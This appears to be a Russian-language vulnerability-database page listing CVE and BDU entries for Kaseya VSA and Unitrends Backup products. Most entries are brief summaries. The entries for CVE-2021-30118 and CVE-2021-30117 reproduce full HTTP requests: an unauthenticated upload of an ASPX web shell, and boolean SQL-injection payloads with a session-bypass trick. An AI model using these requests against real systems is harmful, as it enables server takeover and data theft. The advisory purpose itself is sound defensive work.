nvd,bdu
Kaseya
Уязвимости
37
Эксплуатируемые
2
Критический
14
Высокий
15
Топ продуктов
Топ уязвимостей
CVE-2021-43044В Kaseya Unitrends Backup Appliance до версии 10.5.5 обнаружена проблема. Демон SNMP был настроен со слабым сообществом по умолчанию.
CVE-2021-43042В Kaseya Unitrends Backup Appliance до версии 10.5.5 обнаружена проблема. В компоненте vaultServer существовало переполнение буфера. Это было возможно использовать удаленным не прошедшим проверку подлинности злоумышленником.
CVE-2021-43036В Kaseya Unitrends Backup Appliance до версии 10.5.5 обнаружена проблема. Пароль для учетной записи PostgreSQL wguest является слабым.
CVE-2021-43035В Kaseya Unitrends Backup Appliance до версии 10.5.5 обнаружена проблема. Обнаружены две не прошедшие проверку подлинности уязвимости SQL-инъекций, позволяющие внедрять и выполнять произвольные SQL-запросы под учетной записью суперпользователя postgres. Было возможно удаленное выполнение кода, что приводило к полному доступу к учетной записи пользователя postgres.
CVE-2021-43033В Kaseya Unitrends Backup Appliance до версии 10.5.5 обнаружена проблема. Несколько функций в демоне bpserverd были уязвимы для произвольного удаленного выполнения кода от имени root. Уязвимость была вызвана ненадежным вводом (полученным сервером), который передавался системным вызовам.
CVE-2021-40386Kaseya Unitrends Client/Agent до версии 10.5.5 позволяет удаленным злоумышленникам выполнять произвольный код.
CVE-2021-30118Злоумышленник может загружать файлы с привилегиями процесса веб-сервера для Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 и впоследствии использовать эти файлы для выполнения команд asp. API /SystemTab/uploader.aspx уязвим для неаутентифицированной произвольной загрузки файлов, приводящей к RCE. Злоумышленник может загружать файлы с привилегиями процесса веб-сервера и впоследствии использовать эти файлы для выполнения команд asp. Подробное описание: Дан следующий запрос: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` Злоумышленник может контролировать имя файла, записываемого через параметр qqfile, и местоположение файла, записываемого через параметр PathData. Даже несмотря на то, что вызов требует передачи cookie sessionId, мы определили, что sessionId фактически не проверяется и любое числовое значение принимается как действительное. Обнаружены проблемы безопасности: * cookie sessionId требуется /SystemTab/uploader.aspx, но фактически не проверяется, что позволяет злоумышленнику обходить аутентификацию * /SystemTab/uploader.aspx позволяет злоумышленнику создавать файл с произвольным содержимым в любом месте, куда веб-сервер имеет доступ для записи * Процесс веб-сервера имеет доступ для записи в веб-корень, где злоумышленник может выполнить его, запросив URL-адрес вновь созданного файла. Воздействие: Эта произвольная загрузка файлов позволяет злоумышленнику размещать файлы по своему выбору в любом месте на жестком диске сервера, к которому имеет доступ процесс веб-сервера, включая (но не ограничиваясь) веб-корень. Если злоумышленник загружает файлы с кодом в веб-корень (например, код aspx), он может затем выполнить этот код в контексте веб-сервера, чтобы нарушить либо целостность, конфиденциальность, либо доступность системы, либо украсть учетные данные других пользователей. Другими словами, это может привести к полному компрометации системы.
CVE-2021-30116Kaseya VSA до версии 9.5.7 допускает раскрытие учетных данных, что было использовано в реальных условиях в июле 2021 года. По умолчанию Kaseya VSA on premise предлагает страницу загрузки, с которой можно загрузить клиенты для установки. URL-адрес по умолчанию для этой страницы: https://x.x.x.x/dl.asp. Когда злоумышленник загружает клиент для Windows и устанавливает его, создается файл KaseyaD.ini (C:\Program Files (x86)\Kaseya\XXXXXXXXXX\KaseyaD.ini), который содержит Agent_Guid и AgentPassword. Эти Agent_Guid и AgentPassword можно использовать для входа на dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9). Этот запрос аутентифицирует клиента и возвращает cookie sessionId, который можно использовать в последующих атаках для обхода аутентификации. Обнаружены проблемы безопасности: * Страница загрузки без аутентификации раскрывает учетные данные * Учетные данные программного обеспечения агента можно использовать для получения sessionId (cookie), который можно использовать для служб, не предназначенных для использования агентами * dl.asp принимает учетные данные через GET-запрос * Доступ к KaseyaD.ini дает злоумышленнику доступ к достаточной информации для проникновения в установку Kaseya и ее клиенты. Воздействие: Через страницу /dl.asp можно получить достаточно информации, чтобы предоставить злоумышленнику sessionId, который можно использовать для выполнения дальнейших (полуаутентифицированных) атак на систему.
CVE-2018-6328Было обнаружено, что пользовательский интерфейс Unitrends Backup (UB) до 10.1.0 был подвержен обходу аутентификации, что затем могло позволить неаутентифицированному пользователю внедрять произвольные команды в параметры /api/hosts, используя обратные кавычки.
CVE-2018-20753Kaseya VSA RMM версий до R9.3 9.3.0.35, R9.4 до 9.4.0.36 и R9.5 до 9.5.0.5 позволяет непривилегированным удаленным злоумышленникам выполнять полезные нагрузки PowerShell на всех управляемых устройствах. В январе 2018 года злоумышленники активно использовали эту уязвимость в дикой природе.
CVE-2017-12478Было обнаружено, что веб-интерфейс api/storage в Unitrends Backup (UB) до версии 10.0.0 имеет проблему, при которой один из его входных параметров не был проверен. Удаленный злоумышленник может использовать этот недостаток для обхода аутентификации и выполнения произвольных команд с правами root в целевой системе.
CVE-2017-12477Было обнаружено, что проприетарный протокол bpserverd в Unitrends Backup (UB) до версии 10.0.0, вызываемый через xinetd, имеет проблему, при которой его аутентификацию можно обойти. Удаленный злоумышленник может использовать эту проблему для выполнения произвольных команд с правами root в целевой системе.
CVE-2015-6922Kaseya Virtual System Administrator (VSA) 7.x до версии 7.0.0.33, 8.x до версии 8.0.0.23, 9.0 до версии 9.0.0.19 и 9.1 до версии 9.1.0.9 неправильно требует аутентификацию, что позволяет удаленным злоумышленникам обходить аутентификацию и (1) добавлять учетную запись администратора через созданный запрос к LocalAuth/setAccount.aspx или (2) записывать и выполнять произвольные файлы через полный путь в параметре PathData в ConfigTab/uploader.aspx.
BDU:2021-06171Уязвимость программного обеспечения удаленного мониторинга и управления IT-системами Kaseya VSA (Virtual System Administrator) связана с недостаточной защитой регистрационных данных. Эксплуатация уязвимости может позволить нарушителю, действующему удалённо, раскрыть защищаемую информацию
CVE-2021-43041В Kaseya Unitrends Backup Appliance до версии 10.5.5 обнаружена проблема. Специально созданный HTTP-запрос мог вызвать уязвимость форматированной строки в привилегированном приложении vaultServer.
CVE-2021-43040В Kaseya Unitrends Backup Appliance до версии 10.5.5 обнаружена проблема. Привилегированный vaultServer можно было использовать для создания произвольных доступных для записи файлов, что приводило к повышению привилегий.
CVE-2021-43038В Kaseya Unitrends Backup Appliance до версии 10.5.5 обнаружена проблема. Учетная запись wguest могла выполнять команды путем внедрения в функции триггера PostgreSQL. Это позволило повысить привилегии от пользователя wguest до пользователя postgres.
CVE-2021-40387В серверном программном обеспечении Kaseya Unitrends Backup Software до версии 10.5.5-2 обнаружена проблема. Существует аутентифицированное удаленное выполнение кода.
CVE-2021-40385В серверном программном обеспечении Kaseya Unitrends Backup Software до версии 10.5.5-2 обнаружена проблема. Существует повышение привилегий от пользователя только для чтения до администратора.
CVE-2021-30117Вызов API /InstallTab/exportFldr.asp уязвим для полуаутентифицированной SQL-инъекции на основе логических значений в параметре fldrId. Подробное описание: Дан следующий запрос: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Где значение cookie sessionId было получено через CVE-2021-30116. Результатом должна быть ошибка. Ответ: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link> ----SNIP---- ``` Однако, когда fldrId установлено в ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’, запрос разрешен. Запрос: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Ответ: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```
CVE-2017-12479Было обнаружено, что проблема в логике сеанса в Unitrends Backup (UB) до версии 10.0.0 позволяла использовать переменную среды LOGDIR во время веб-сеанса для повышения прав существующего пользователя с низкими привилегиями до прав root. Удаленный злоумышленник с существующими учетными данными с низкими привилегиями мог затем выполнить произвольные команды с правами root.
CVE-2015-6589Уязвимость обхода каталогов в Kaseya Virtual System Administrator (VSA) 7.0.0.0 до версии 7.0.0.33, 8..0.0.0 до версии 8.0.0.23, 9.0.0.0 до версии 9.0.0.19 и 9.1.0.0 до версии 9.1.0.9 позволяет удаленным аутентифицированным пользователям записывать и выполнять произвольные файлы из-за недостаточных ограничений в путях к файлам в json.ashx.
BDU:2023-02419Уязвимость компонента /InstallTab/exportFldr.asp программного обеспечения удаленного мониторинга и управления IT-системами Kaseya VSA (Virtual System Administrator) связана с непринятием мер по защите структуры запроса SQL при обработке параметра fldrId. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, выполнить произвольный SQL-код
CVE-2021-43037В Kaseya Unitrends Backup Appliance до версии 10.5.5 обнаружена проблема. Агент Unitrends для Windows был уязвим для DLL-инъекций и размещения двоичных файлов из-за небезопасных разрешений по умолчанию. Это позволило повысить привилегии от непривилегированного пользователя до SYSTEM.
CVE-2021-43034В Kaseya Unitrends Backup Appliance до версии 10.5.5 обнаружена проблема. Доступный для записи всем пользователям файл позволял локальным пользователям выполнять произвольный код от имени пользователя apache, что приводило к повышению привилегий.